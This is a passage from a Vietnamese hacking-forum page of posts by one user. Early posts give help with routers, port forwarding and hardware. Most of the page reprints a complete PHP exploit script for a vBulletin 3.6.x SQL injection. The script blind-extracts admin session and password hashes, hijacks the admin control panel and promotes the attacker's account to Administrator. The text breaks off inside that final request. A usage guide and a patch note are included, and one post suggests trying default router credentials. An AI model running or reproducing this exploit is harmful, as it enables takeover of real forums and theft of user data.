banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Messages posted by: kid_b0d  XML
Profile for kid_b0d Messages posted by kid_b0d [ number of posts not being displayed on this page: 0 ]
 
Quan niệm của tớ là: học thì học nhưng tôi chưa bao giờ quan trọng việc bằng cấp, quan trọng là mình biết được những gì trong quá trình học hỏi.
Linux bản thân nó đã là một server, còn bản ubuntu thì tớ chưa biết.
Máy bị chết"tạm thời" là do phải xử lý quá nhiều process , bạn chờ vài giây hoặc nếu máy yếu thì bỏ bớt tùy chọn.
NMAP chỉ dùng cho linux, nó được viết bằng C và trong linux hỗ trợ tốt C.

o0_annie_trang_0o wrote:
àh, em hiểu sơ sơ rồi, nghĩa là với người dùng bình thường thì họ giống như là guest, và học chỉ có quyền trong giới hạn như admin đã định, nếu có USER và PASS (lấy được bằng 1 cách nào đó, thậm chí cũng cũng chẳng cần, dựa trên những lỗi của các server như n conmale nói) thì lúc đó sẽ đăng nhập như admin và tiến hành thay đổi tuỳ ý trong server, đúng hok ta??

ví dụ như em tracert yahoomail.com
IP đầu tiên là http://192.168.1.1/
khi em vào thì nó đòi user và pass, nếu ko có nó ghi : "401 Unauthorized
Authorization required"

thế làm sao người ta biết thông tin về server đó ạ (OS gì, chạy dịch vụ gì?...) ? 


User và passwd của thằng này thì bạn liên hệ với kỹ thuật viên hệ thống mạng bạn đang sài để lấy nó, hoặc dùng user và passwd mặc định như admin / admin thử xem smilie
smilie-)) àh, nhân tiện nói với bạn luôn là bạn đang tuy xuất vào router của bạn đấy chứ không phải Yahoo gì cả .
Còn OS bạn đang chạy thì bạn phải biết chứ nhỉ?, dịch vụ có thể là Vietel, VDC,FPT... :!smilie
Lâu gùi mới thấy bài vui như vậy smilie thank bạn !
nhìn là biết loại modem Dlink, OK! Dlink có support Nat . giờ bạn hãy làm như sau nhé smilie
vào Modem Manager qua cổng http, sau đó Chọn table Advanced/ Lan clients/
IP Address <== điền vào IP Lan của bạn ( nhớ khai báo IP lan đầy đủ trong my network places/properties/TCP/IP
Host Name <== gì cũng được .

Sau đó Click add .

tiếp theo chọn thẻ Vitual server /
trong này nó đã khai báo sẵn các tùy chọn cho bạn, OK! bây giờ bạn hãy click vào tùy chọn Servers , là nơi cung cấp sẵn cho bạn các ứng dụng về server, chọn Web server để Open port 80 qua giao thức http , Click add và Apply để kết thúc nó.
Note: có thể ở một số modem không support sẵn và bắt bạn phải tự open port, Source address port và destination address port đều điền 80 ( có thể tùy chọn port khác nhưng với điều kiện là khi type address trên trình duyệt bạn phải gõ đầy đủ , vd IP của bạn là 123.65.2.14 và port bạn open là 50 thì address đầy đủ là : 123.65.2.14:50 vì Brown phía Client chỉ hiểu được với server của bạn là port 80 (mặc định).

Điều căn bản nhất của web server thì chắc bạn cũng biết là cần phải có apache và các plugin để web server hoạt động , bạn nên dùng Appserv để làm hosting vì bản thân tôi thấy Appserv khá hay trong việc làm 1 web server.
sau đó bạn vào ip2location.com , gửi ip của bạn cho người khác check , nếu nó ra trang index của bạn là ok! , bạn có thể vào dnsdynamic để tạo cho mình 1 domain update IP liên tục cho tiện .
Chúc bạn thành công.

Mặc định của Cổng telnet là cổng 23, 21 là FTP và 80 là http, ping được là chuyện bình thường thoai để chứng tỏ là IP đó có tồn tại. Bạn nói rõ hơn là ban đã forward Port trong modem chưa? nếu rồi thì không có lý do gì là không được cả .
Tôi xin trả lời câu hỏi thứ 1 của bạn:
Tôi có 1 thắc mắc, đã login vào được phần http://thewebhostdirectory.co.uk/admin (dùng pass test của bác hoặc cách Javascript Inline của Gama) rồi thì sao ko backup thẳng luôn mà phải log out ra rồi tận dụng lỗi website ko check session kỹ để backup database ? Nó đâu có gì khác nhau ?
 


Vấn đề đặt ra ở đây là :learn to hack chứ không hack to learn , vì vậy nên bước đầu login vào để cho chúng ta quan sát rõ cấu trúc bên trong 1 cách trực quan hơn về các bugs của source này. sau đó login ra với tư cách là 1 visitor , tức là 1 người bình thường , với tư cách guest . sau đó mới actack thông qua những gì bạn đã quan sát được và đương nhiên lần sau nếu gặp thì thực hiện actack luôn chứ hơi đâu mà vào quan sát nữa.

Câu thứ 2:
Khi thực hiện phương thức Post từ Client thì chúng ta sẽ đưa vào 1 Action (Sự kiện) để nó thực thi dòng lệnh khi nhận được từ phía server. giống như khi ra gửi Boom thì cần phải có Address destination chứ smilie .
và vì sao có thể login với passwd là VBF thì bạn nên xem lại cái code trên . nó sẽ thực thi 1 dòng lệnh trong đó cho phép change passwd của admin mà không cần phải khai báo passwd cũ (bugs) . Như vậy là ta có thể hiểu được vì sao ta có thể tấn công nó 1 cách dễ dàng như vậy.
Bạn ấy đã nói là tít tít do lắp lỏng quạt và sau đó lắp lại thì không còn bị nữa? vậy sao các pác cứ tù hóa kiến thức thế nhỉ? Lỗi trên báo cũng có nhìu nguyên nhân , thông báo lỗi này xuất hiện khi một trong những thiết bị của hệ thống không đồng bộ , và có thể do sự thay đổi của một cái gì đó khiến hệ điều hành không hoạt động được.
Theo tôi nghĩ các trường hợp sau, nếu thíu các pác bổ sung thêm hen!
+ Do trong quá trình vệ sinh bạn rút dây cắm từ HDD vào Main, sau đó cắm vào lại không chặt hoặc dây bị đứt <== thay dây cáp, trường hôp này nên lưu ý vì khả năng cao , dẫn đến tình trạng khi nạp windows báo lỗi.
+ Do cắm Ram có vấn đề dẫn đến ảnh hưởng quá trình loading của hệ thống (hoặc hư Ram )dẫn đến hiện tượng trên <== check RAM
+ Do bạn cắm CPU bị lệch chân hoặc không khít dẫn đến hiện tượng trên ( có thể do quạt lệch ảnh hưởng ) <== cắm lại cho khít và đều.

Tớ nghĩ là không an toàn, vì cậu có quyền cho phép người đó thực hiện truy xuất trên cùng 1 hosting nhưng không có quyền bắt hoặc cấm người ta phải làm những gì và không nên làm những gì? nếu tin tưởng thì chấp nhận thoai, còn không tin thì Order Hosting khác làm vậy.
nút Back trên brown để làm gì vậy?

Để active nó chọn View/ToolBars/Navigation toolbars
Còn ý bạn nói là trong php , bạn muốn code sao cho người đọc có thể back sau khi xem xong 1 trang đúng hok? bạn đừng Open links new windows là được , còn sau khi xem trang sau thì fisrt address được lưu lại , cái này là công việc từ phía client.
bạn thử dùng 1 Hdd 80Gb maxtor khác cài thử win chưa? nếu cũng không được thì do main không support hoặc chưa active . bạn vào bios xem thử.
Còn nếu cài được thì bạn đem cái Hdd 80Gbkia quăng vào sọt rác cho rùi, hoặc đổi ổ khác.
Symple mà !
Còn vì sao cái kia bị vậy thì nó liên quan nhiều đến phần cứng , bạn đem đến cho mấy kỹ thuật viên máy tính sẽ biết .
sao các bro hướg dẫn mà em đú hiểu ji hết . 1 CpU = 2 monitor ?? 2 user cùng sử dụng 1 lúc? vậy phải có 2 Mouse + 2 keyboard trên cùng 1 Case?? rùi sao nữa? Lợi ích : đỡ tốn kém ? OK ! nhưng bất lợi :?? 1 case có support 2 keyboard và 2 mouse hem? và chẳng biết dùng để làm gì ?
trước em nghe 1 cpu = 2 monitor thì OK goài, nhưng 2 người dùng 2 monitor nhưng chỉ 1 control thì cũng giống như 1 người mà thoai .
Chỉ 1 cách đơn giản mà nhanh nhất , copy và paste.
còn vì sao đơn giản và nhanh thì là "hàng độc quyền".
run/cmd/netstat -na

========
vậy ví dụ như mình có quyền truy cập telnet đến máy có account thì làm sao để biết được passwd của account đó?
Bài viết giống như 1 chuyến thám hiểm nhưng có quá nhiều chi tiết phụ , QA tìm hiểu + suy luận kỹ quá nên đã đi sai vấn đề chính cần bàn .
bài viết " khó hiểu" quá , nhưng có vẽ hay hay nhỉ . :d
Cái này có thể dùng bugs (inlinemod.php postids) Remote SQL Injection Exploit
Code:
<?php
print_r('
-----------------------------------------------------------------------------
vBulletin <= 3.6.4 inlinemod.php "postids" sql injection / privilege
escalation by session hijacking exploit
by rgod
mail: retrog at alice dot it
site: http://retrogod.altervista.org
Works regardless of php.ini settings, you need a Super Moderator account
to copy posts among threads, to be launched while admin is logged in to
the control panel, this will give you full admin privileges
note: this will flood the forum with empty threads even!
-----------------------------------------------------------------------------
');
if ($argc<7) {
print_r('
-----------------------------------------------------------------------------
Usage: php '.$argv[0].' host path user pass forumid postid OPTIONS
host: target server (ip/hostname)
path: path to vbulletin
user/pass: you need a moderator account
forumid: existing forum
postid: existing post
Options:
-p[port]: specify a port other than 80
-P[ip:port]: specify a proxy
Example:
php '.$argv[0].' localhost /vbulletin/ rgod mypass 2 121 -P1.1.1.1:80
php '.$argv[0].' localhost /vbulletin/ rgod mypass 1 143 -p81
-----------------------------------------------------------------------------
');
die;
}
/*
vulnerable code in inlinemod.php near lines 185-209:
...
case 'docopyposts':
$vbulletin->input->clean_array_gpc('p', array(
'postids' => TYPE_STR,
));
$postids = explode(',', $vbulletin->GPC['postids']);
foreach ($postids AS $index => $postid)
{
if ($postids["$index"] != intval($postid))
{
unset($postids["$index"]);
}
}
if (empty($postids))
{
eval(standard_error(fetch_error('no_applicable_posts_selected')));
}
if (count($postids) > $postlimit)
{
eval(standard_error(fetch_error('you_are_limited_to_working_with_x_posts', $postlimit)));
}
break;
...
when an element of $postids array is not an integer, it fails to unset() the proper value.
An example:
<?php
$foo[1]="99999) UNION SELECT foo FROM foo WHERE foo=1 LIMIT 1/*";
$foo[2]=intval($foo[1]);
echo $foo[1]."\n";
echo $foo[2]."\n";
if ($foo[1] != $foo[2])
{
echo "they are different";
}
else
{
echo "they match!";
}
?>
output:
99999) UNION SELECT foo FROM foo WHERE foo=1 LIMIT 1/*
99999
they match!
this because when php tries to comparise a string with an integer
it tries to convert the string in its integer value, it chooses the first integer chars
of the string itself!
so unset() never run!
the result is sql injection near lines 3792-3800:
...
$posts = $db->query_read_slave("
SELECT post.postid, post.threadid, post.visible, post.title, post.username, post.dateline, post.parentid, post.userid,
thread.forumid, thread.title AS thread_title, thread.postuserid, thread.visible AS thread_visible, thread.firstpostid,
thread.sticky, thread.open, thread.iconid
FROM " . TABLE_PREFIX . "post AS post
LEFT JOIN " . TABLE_PREFIX . "thread AS thread USING (threadid)
WHERE postid IN (" . implode(',', $postids) . ")
ORDER BY post.dateline
");
...
this exploit extract various session hashes from the database
to authenticate as admin and to change the privileges of a registered user
I could not find a way to see results inside html, so this asks true/false
questions to the database, copying posts around threads
possible patch, replace:
foreach ($postids AS $index => $postid)
{
if ($postids["$index"] != intval($postid))
{
unset($postids["$index"]);
}
}
with:
foreach ($postids AS $index => $postid)
{
$postids["$index"]=(int)$postids["$index"];
}
and, some line before:
foreach ($threadids AS $index => $threadid)
{
if ($threadids["$index"] != intval($threadid))
{
unset($threadids["$index"]);
}
}
with:
foreach ($threadids AS $index => $threadid)
{
$threadids["$index"]=(int)$threadids["$index"];
}
vendor was contacted by email form...
*/
error_reporting(7);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
}
$host=$argv[1];
$path=$argv[2];
$user=$argv[3];
$pass=md5($argv[4]);
$forumid=(int)$argv[5];
$existing_post=(int)$argv[6];
$port=80;
$proxy="";
for ($i=3; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
$data="vb_login_username=$user";
$data.="&vb_login_password=";
$data.="&s=";
$data.="&do=login";
$data.="&vb_login_md5password=$pass";
$data.="&vb_login_md5password_utf=$pass";
$packet="POST ".$p."login.php HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$packet.="Referer: http://".$host.$path."login.php\r\n";
$packet.="Accept-Language: en\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Pragma: no-cache\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
$cookie="";
$temp=explode("Set-Cookie: ",$html);
for ($i=1; $i<count($temp); $i++)
{
$temp2=explode(" ",$temp[$i]);
$cookie.=" ".trim($temp2[0]);
}
//echo "your cookie -> ".$cookie."\n\n";
if (!eregi("sessionhash",$cookie)){die("failed to login...");}$temp=str_replace(" ","",$cookie);$temp=str_replace("sessionhash","",$temp);
$temp=str_replace("lastvisit","",$temp);$temp=str_replace("lastactivity","",$temp);$temp=explode("=",$temp);$temp=explode(";",$temp[1]);
$cookie_prefix=trim($temp[1]);echo "cookie prefix -> ".$cookie_prefix."\n";
$chars[0]=0;//null
$chars=array_merge($chars,range(48,57)); //numbers
$j=1;$uid="";
echo "admim user id -> ";
while (!strstr($uid,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
if (in_array($i,$chars))
{
$data ="s=";
$data.="&do=docopyposts";
$data.="&destforumid=$forumid";
$data.="&title=suntzu";
$data.="&forumid=$forumid";
$data.="&postids=9999999)/**/UNION/**/SELECT/**/(IF((ASCII(SUBSTRING(userid,".$j.",1))=".$i."),$existing_post,-999999)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/user/**/WHERE/**/usergroupid=6/**/LIMIT/**/1/*";
$packet ="POST ".$p."inlinemod.php?f=$forumid HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$packet.="Referer: http://".$host.$path."profile.php\r\n";
$packet.="Accept-Language: it\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Pragma: no-cache\r\n";
$packet.="Cookie: ".$cookie."; \r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
$temp=explode("showthread.php?t=",$html);
$temp2=explode("\n",$temp[1]);
$thread=(int)$temp2[0];
$packet ="GET ".$p."showthread.php?t=$thread HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$packet.="Referer: http://".$host.$path."profile.php\r\n";
$packet.="Accept-Language: it\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Pragma: no-cache\r\n";
$packet.="Cookie: ".$cookie."; \r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (eregi("You have an error in your SQL syntax",$html)){echo $html; die("\nunknown query error...");}
if (eregi("join date",$html)) {$uid.=chr($i);echo chr($i); sleep(1); break;}
}
if ($i==255) {
die("\nExploit failed...");
}
}
$j++;
}
if (trim($uid)==""){die("\nExploit failed...");}else{echo "\nvulnerable!";}
$uid=intval($uid);
function my_encode($my_string)
{
$encoded="CHAR(";
for ($k=0; $k<=strlen($my_string)-1; $k++)
{
$encoded.=ord($my_string[$k]);
if ($k==strlen($my_string)-1) {$encoded.=")";}
else {$encoded.=",";}
}
return $encoded;
}
$j=1;$my_uid="";
echo "\nyour user id -> ";
while (!strstr($my_uid,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
if (in_array($i,$chars))
{
$data ="s=";
$data.="&do=docopyposts";
$data.="&destforumid=$forumid";
$data.="&title=suntzu";
$data.="&forumid=$forumid";
$data.="&postids=9999999)/**/UNION/**/SELECT/**/(IF((ASCII(SUBSTRING(userid,".$j.",1))=".$i."),$existing_post,-999999)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/user/**/WHERE/**/username=".my_encode($user)."/**/LIMIT/**/1/*";
$packet ="POST ".$p."inlinemod.php?f=$forumid HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$packet.="Referer: http://".$host.$path."profile.php\r\n";
$packet.="Accept-Language: it\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Pragma: no-cache\r\n";
$packet.="Cookie: ".$cookie."; \r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
if (eregi("You have an error in your SQL syntax",$html)){echo $html; die("\nunknown query error...");}
$temp=explode("showthread.php?t=",$html);
$temp2=explode("\n",$temp[1]);
$thread=(int)$temp2[0];
$packet ="GET ".$p."showthread.php?t=$thread HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$packet.="Referer: http://".$host.$path."profile.php\r\n";
$packet.="Accept-Language: it\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Pragma: no-cache\r\n";
$packet.="Cookie: ".$cookie."; \r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (eregi("join date",$html)) {$my_uid.=chr($i);echo chr($i); sleep(1); break;}
}
if ($i==255) {
die("\nExploit failed...");
}
}
$j++;
}
$my_uid=intval($my_uid);
$chars[0]=0;//null
$chars=array_merge($chars,range(48,57)); //numbers
$chars=array_merge($chars,range(97,102));//a-f letters
$j=1;$sess_hash="";
echo "\nsession hash -> ";
while (!strstr($sess_hash,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
if (in_array($i,$chars))
{
$data ="s=";
$data.="&do=docopyposts";
$data.="&destforumid=$forumid";
$data.="&title=suntzu";
$data.="&forumid=$forumid";
$data.="&postids=9999999)/**/UNION/**/SELECT/**/(IF((ASCII(SUBSTRING(sessionhash,".$j.",1))=".$i."),$existing_post,-999999)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/session/**/WHERE/**/userid=$uid/**/LIMIT/**/1/*";
$packet ="POST ".$p."inlinemod.php?f=$forumid HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$packet.="Referer: http://".$host.$path."profile.php\r\n";
$packet.="Accept-Language: it\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Pragma: no-cache\r\n";
$packet.="Cookie: ".$cookie."; \r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
if (eregi("You have an error in your SQL syntax",$html)){echo $html; die("\nunknown query error...");}
$temp=explode("showthread.php?t=",$html);
$temp2=explode("\n",$temp[1]);
$thread=(int)$temp2[0];
$packet ="GET ".$p."showthread.php?t=$thread HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$packet.="Referer: http://".$host.$path."profile.php\r\n";
$packet.="Accept-Language: it\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Pragma: no-cache\r\n";
$packet.="Cookie: ".$cookie."; \r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (eregi("join date",$html)) {$sess_hash.=chr($i);echo chr($i); sleep(1); break;}
}
if ($i==255) {
die("\nExploit failed...");
}
}
$j++;
}
$j=1;$my_hash="";
echo "\nuser password hash -> ";
while (!strstr($my_hash,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
if (in_array($i,$chars))
{
$data ="s=";
$data.="&do=docopyposts";
$data.="&destforumid=$forumid";
$data.="&title=suntzu";
$data.="&forumid=$forumid";
$data.="&postids=9999999)/**/UNION/**/SELECT/**/(IF((ASCII(SUBSTRING(password,".$j.",1))=".$i."),$existing_post,-999999)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/user/**/WHERE/**/userid=$uid/**/LIMIT/**/1/*";
$packet ="POST ".$p."inlinemod.php?f=$forumid HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$packet.="Referer: http://".$host.$path."profile.php\r\n";
$packet.="Accept-Language: en\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Pragma: no-cache\r\n";
$packet.="Cookie: ".$cookie."; \r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
if (eregi("You have an error in your SQL syntax",$html)){echo $html; die("\nunknown query error...");}
$temp=explode("showthread.php?t=",$html);
$temp2=explode("\n",$temp[1]);
$thread=(int)$temp2[0];
$packet ="GET ".$p."showthread.php?t=$thread HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$packet.="Referer: http://".$host.$path."profile.php\r\n";
$packet.="Accept-Language: en\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Pragma: no-cache\r\n";
$packet.="Cookie: ".$cookie."; \r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (eregi("join date",$html)) {$my_hash.=chr($i);echo chr($i); sleep(1); break;}
}
if ($i==255) {
die("\nExploit failed...");
}
}
$j++;
}
$j=1;$cpsess_hash="";
echo "\ncp session hash -> ";
while (!strstr($cpsess_hash,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
if (in_array($i,$chars))
{
$data ="s=";
$data.="&do=docopyposts";
$data.="&destforumid=$forumid";
$data.="&title=suntzu";
$data.="&forumid=$forumid";
$data.="&postids=9999999)/**/UNION/**/SELECT/**/(IF((ASCII(SUBSTRING(hash,".$j.",1))=".$i."),$existing_post,-999999)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/cpsession/**/WHERE/**/userid=$uid/**/LIMIT/**/1/*";
$packet ="POST ".$p."inlinemod.php?f=$forumid HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$packet.="Referer: http://".$host.$path."profile.php\r\n";
$packet.="Accept-Language: en\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Pragma: no-cache\r\n";
$packet.="Cookie: ".$cookie."; \r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
$temp=explode("showthread.php?t=",$html);
$temp2=explode("\n",$temp[1]);
$thread=(int)$temp2[0];
$packet ="GET ".$p."showthread.php?t=$thread HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$packet.="Referer: http://".$host.$path."profile.php\r\n";
$packet.="Accept-Language: en\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Pragma: no-cache\r\n";
$packet.="Cookie: ".$cookie."; \r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
if (eregi("You have an error in your SQL syntax",$html)){echo $html; die("\nunknown query error...");}
if (eregi("join date",$html)) {$cpsess_hash.=chr($i);echo chr($i); sleep(1); break;}
}
if ($i==255) {
die("\nExploit failed...");
}
}
$j++;
}
echo "\n";
$packet ="GET ".$p."admincp/user.php?do=edit&u=$my_uid HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$packet.="Referer: http://".$host.$path."profile.php\r\n";
$packet.="Accept-Language: en\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Pragma: no-cache\r\n";
$packet.="Cookie: ".$cookie_prefix."lastactivity=0; ".$cookie_prefix."password=".md5(trim($my_hash))."; bbuserid=".$uid."; ".$cookie_prefix."sessionhash=".trim($sess_hash)."; ".$cookie_prefix."cpsession=".trim($cpsess_hash).";\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
$temp=explode("adminhash\" value=\"",$html);
$temp2=explode("\"",$temp[1]);
$adminhash=$temp2[0];
echo "adminhash ->".$adminhash."\n";
if ($adminhash<>"") {echo "\ndone! you are in... updating ".$user." rights";}
else {die("\nexploit failed...");}
//join to the Administrator group
$my_email="suntzu@suntzu.com";
$data ="do=update";
$data.="&adminhash=$adminhash";
$data.="&quicklinks=user.php%3Fdo%3Deditaccess%26u%3D".$my_uid;
$data.="&user%5Busername%5D=$user";
$data.="&password=";
$data.="&user%5Bemail%5D=$my_email";
$data.="&user%5Blanguageid%5D=0";
$data.="&user%5Busertitle%5D=Admin";
$data.="&user%5Bcustomtitle%5D=0";
$data.="&user%5Bhomepage%5D=";
$data.="&user%5Bbirthday%5D%5Bmonth%5D=0";
$data.="&user%5Bbirthday%5D%5Bday%5D=";
$data.="&user%5Bbirthday%5D%5Byear%5D=";
$data.="&user%5Bshowbirthday%5D=0";
$data.="&user%5Bsignature%5D=";
$data.="&user%5Bicq%5D=";
$data.="&user%5Baim%5D=";
$data.="&user%5Byahoo%5D=";
$data.="&user%5Bmsn%5D=";
$data.="&user%5Bskype%5D=";
$data.="&options%5Bcoppauser%5D=0";
$data.="&user%5Bparentemail%5D=$my_email";
$data.="&user%5Breferrerid%5D=";
$data.="&user%5Bipaddress%5D=";
$data.="&user%5Bposts%5D=0";
$data.="&userfield%5Bfield1%5D=";
$data.="&userfield%5Bfield2%5D=";
$data.="&userfield%5Bfield3%5D=";
$data.="&userfield%5Bfield4%5D=";
$data.="&user%5Busergroupid%5D=6";//primary usergroup, 6=Administrators
$data.="&user%5Bdisplaygroupid%5D=-1";
$data.="&user%5Bmembergroupids%5D%5B%5D=5";//secondary usergroup, 5=Super Moderators
$data.="&options%5Bshowreputation%5D=1";
$data.="&user%5Breputation%5D=10";
$data.="&user%5Bwarnings%5D=0";
$data.="&user%5Binfractions%5D=0";
$data.="&user%5Bipoints%5D=0";
$data.="&options%5Badminemail%5D=1";
$data.="&options%5Bshowemail%5D=0";
$data.="&options%5Binvisible%5D=0";
$data.="&options%5Bshowvcard%5D=0";
$data.="&options%5Breceivepm%5D=1";
$data.="&options%5Breceivepmbuddies%5D=0";
$data.="&options%5Bemailonpm%5D=0";
$data.="&user%5Bpmpopup%5D=0";
$data.="&options%5Bshowsignatures%5D=1";
$data.="&options%5Bshowavatars%5D=1";
$data.="&options%5Bshowimages%5D=1";
$data.="&user%5Bautosubscribe%5D=-1";
$data.="&user%5Bthreadedmode%5D=0";
